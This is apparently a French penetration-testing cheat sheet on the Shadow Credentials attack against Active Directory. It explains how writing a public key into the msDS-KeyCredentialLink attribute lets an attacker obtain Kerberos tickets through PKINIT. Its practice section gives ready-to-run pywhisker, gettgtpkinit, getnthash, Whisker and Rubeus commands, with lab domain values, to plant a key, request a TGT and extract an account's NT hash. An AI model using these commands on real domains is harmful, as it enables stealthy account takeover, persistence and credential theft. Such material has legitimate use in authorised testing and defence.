Shadow Credentials 🚧

Théorie#

Les objets utilisateur et ordinateur dans Active Directory possèdent un attribut msDS-KeyCredentialLink dans lequel des clés publiques brutes peuvent être stockées. Lorsqu’on tente une pré-authentification via PKINIT, le KDC vérifie que l’utilisateur authentifiant possède la clé privée correspondante. Si c’est le cas, un TGT est délivré.

Plusieurs scénarios permettent à un attaquant de contrôler un compte ayant la capacité d’éditer l’attribut msDS-KeyCredentialLink (dit « kcl ») d’autres objets (par ex. membre d’un groupe spécial, possédant des ACE puissants, etc.). Cela permet à un attaquant de générer une paire de clés, d’ajouter la clé publique brute dans l’attribut ciblé et d’obtenir ainsi un accès persistant et furtif à l’objet visé (utilisateur ou ordinateur).

Pré-requis#

• Que le domaine supporte PKINIT
• Que le contrôleur de domaine soit en Windows Server 2016 ou plus récent
• Que les contrôleurs de domaines possèdent leur propre paire de clé
• Avoir le contrôle d’un compte capable de modifier l’attribut msDs-KeyCredentialLink de l’objet cible.

Pratique#

pywhisker -d zsm.local -u marcus -p 'pass' --target 'ZPH-SVRMGMT1$' --action list
pywhisker -d zsm.local -u marcus -p 'pass' --target 'ZPH-SVRMGMT1$' --action add

gettgtpkinit.py -dc-ip 192.168.210.10 -cert-pfx ../pywhisker/VWRdeSvQ.pfx  -pfx-pass '4Nf4b4DyEa3NWxJPNyQS' zsm.local/ZPH-SVRMGMT1$ ZPH-SVRMGMT1.ccache

KRB5CCNAME=ZPH-SVRMGMT1.ccache

getnthash.py -dc-ip 192.168.210.10 -key d667660410be648a521d88a9c3104475d833684aacb8be547aedde2813526259 'zsm.local/ZPH-SVRMGMT1$'

Whisker.exe list /target:$CIBLE

Whisker.exe add /target:$CIBLE

Rubeus.exe asktgt /user:$CIBLE /certificate:$CERTIFICATE /password:$ENC_PASSWORD /nowrap

# Lister les entrées pour cibler uniquement les device_id de celles(s) que l'on veut supprimer
Whisker.exe list /target:$CIBLE

# Supprimer les clés des attributs msDS-KeyCredentialLink
Whisker.exe remove /target:$CIBLE /deviceid:$DEVICEID